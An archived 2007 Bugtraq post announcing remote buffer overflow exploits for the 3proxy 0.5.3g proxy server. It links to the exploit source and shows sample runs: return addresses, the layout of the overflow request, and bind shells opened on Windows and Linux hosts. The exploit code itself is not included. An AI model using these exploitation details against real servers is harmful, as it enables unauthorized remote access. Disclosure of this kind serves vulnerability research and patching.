lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 29 Apr 2007 23:06:41 -0400 (EDT)
From: v9 <v9@...ehalo.us>
To: bugtraq@...urityfocus.com
Subject: 3proxy[v0.5.3g]: (linux/win32 service) remote buffer overflow
 exploits.

just for fun...

original exploit references:
 http://fakehalo.us/x3proxy-win32.c
 http://fakehalo.us/x3proxy.c


 example(win32 service):
-------------------------------------------------------------------------

[v9@...lo v9]$ gcc x3proxy-win32.c -o x3proxy-win32
[v9@...lo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan
[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.
[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)

[*] target: desktop.fakehalo.lan:3128
[*] return address($eip/"CALL ESP"): 0x7c81518b
[*] attempting to connect: desktop.fakehalo.lan:3128.
[*] successfully connected: desktop.fakehalo.lan:3128.
[*] sending string:
[+]  GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n
[+]  Host: [FILLERx999]\n\n
[*] closing connection.

[*] attempting to connect: desktop.fakehalo.lan:7979.
[*] successfully connected: desktop.fakehalo.lan:7979.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


 example(linux):
-------------------------------------------------------------------------

[v9@...lo v9]$ gcc x3proxy.c -o x3proxy
[v9@...lo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c
[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit.
[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)

[*] target                      : XXXXXXX.net:3128
[*] shellcode type              : bindshell(port=7979)
[*] return address($eip)        : 0x0805333c(+0=0x0805333c)
[*] attempting to connect: XXXXXXX.net:3128.
[*] successfully connected: XXXXXXX.net:3128.
[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n"
[*] closing connection.

[*] attempting to connect: XXXXXXX.net:7979.
[*] successfully connected: XXXXXXX.net:7979.

Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686
Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux
uid=515(v9) gid=572(v9) groups=572(v9)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ